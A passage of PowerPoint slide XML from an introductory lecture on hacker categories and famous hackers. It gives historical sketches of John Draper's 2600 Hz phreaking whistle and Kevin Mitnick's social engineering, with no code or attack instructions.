            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8A174C2-E983-405B-9EE6-C621AA45B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306" y="1005299"/>
            <a:ext cx="5138305" cy="5097198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="CasellaDiTesto 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92F7F056-9C57-40C0-BFC5-5CE91F830967}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5809365" y="6429853"/>
            <a:ext cx="5777346" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0"/>
              <a:t>Fonte immagine: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Advanced_persistent_threat</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3407481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8E0A646-15FA-4880-A223-0FDDB53F24B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DE6CE9C-9427-4F95-B9E3-A2089C448C34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>subclasses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of hackers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CasellaDiTesto 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86DB660A-5482-4DF1-BD01-4FF2DF7EBFCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="529936" y="1007918"/>
            <a:ext cx="9131100" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>Cyber-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>terrorists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the word </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>says</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>these</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> people makes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> actions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>against</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>sensible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> targets with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>aim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>terrorism</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Malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> insider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>simply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>disgruntled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>employee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>but</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a hacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> acts from inside the target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>infrastructure</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Hacktivists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>aims</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>kind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>actors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> are for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>most</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> part </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>political</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>. Some of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>most</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>famous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>hacktivists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>Julian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Assange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>Edward </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Snowden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Their</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> actions are, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>according</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to public opinion, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>noble</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> actions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>aim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>ensure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> human </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>rights</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> in the case of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Assange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, and Privacy, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> in the case of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Snowden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Immagine che contiene uomo, persona, tuta, abbigliamento&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EEF3F54-A552-486C-A07D-02FC7542B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918" y="3870240"/>
            <a:ext cx="5199922" cy="2891129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="482794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48E63834-746D-4C48-BC3A-8691CBDEA1A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BDE6CF4-4C10-4C97-AC8E-B6E40E34B0A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>John </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>thomas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>draper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Cap'n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Crunch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene persona, uomo, parete, interni&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D51F2BA7-5C93-4010-8103-88342B7AC876}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="18744" r="14247"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8673793" y="554482"/>
            <a:ext cx="2912918" cy="3253422"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="Immagine che contiene elettronico&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23597562-1017-4A79-8250-07FAEBC12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3793" y="3807904"/>
            <a:ext cx="2912918" cy="1802368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="CasellaDiTesto 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B92EB98-4282-4E4E-8B91-68D46F149ED3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432000" y="864000"/>
            <a:ext cx="7932682" cy="5355312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>He’s considered one of the first phreakers in history.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Joined the US Air Force in 1964, and while stationed in Alaska, he discovered how to make free phone calls. He received a phone number from a certain Danny, and the number linked him to a primeval telephone chat, in which he spoke a technical jargon that he did not know. He went to Danny's house and discovered that he was a blind boy and, with two other friends, in his room, he was playing with the telephone and a musical keyboard.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Draper learned that a toy whistle packaged in boxes of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Cap'n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> Crunch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>cereal emitted a tone at precisely 2600 hertz—the same frequency that AT&amp;T long lines used to indicate that a trunk line was available for routing a new call. The tone disconnected one end of the trunk while the still-connected side entered an operator mode.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>An urban myth says that John and his friends discovered a private number of the White House and called President Nixon. The story tells that the call was like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>John: "Olympus, please"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Operator: "One moment, please ..."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Nixon: "What's going on?"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>John: "Mr. President, there is a crisis here in Los Angeles"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Nixon: "What kind of crisis?"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>John: "We are out of toilet paper, Mr. President."</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76666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321CC28-1178-4AE0-B1A8-B208361DF606}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16062437-EE2A-48B3-BB0B-B82EA0C3945A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Kevin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>mitnick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, the condor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF4AF10F-FF28-4785-AE25-B8B8960D1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7637" y="181926"/>
            <a:ext cx="3127595" cy="4372841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CasellaDiTesto 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79305E6A-3F74-47E5-858B-559ED02198EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432000" y="976745"/>
            <a:ext cx="8171673" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Perhaps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>most</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>famous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> hacker.</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In the nineties it began to illegally infiltrate the computer systems of increasingly large companies, exploiting numerous bugs in their computer systems, and above all using the so-called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>social engineering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>technique, that is, acquiring confidential information directly from the people involved, gaining their trust through deception.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 was among the first to use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>IP spoofing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>technique, which allows you to acting as another host.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 was also, like John Draper, a Phreaker.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 most famous works as an author are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>“The art of deception” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>“The art of intrusion”.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After serving a sentence of about three years in the late nineties, he is today security consultant for a large number of companies.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="200781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DCE1C636-35FE-4B03-9549-3CB508A5AC04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
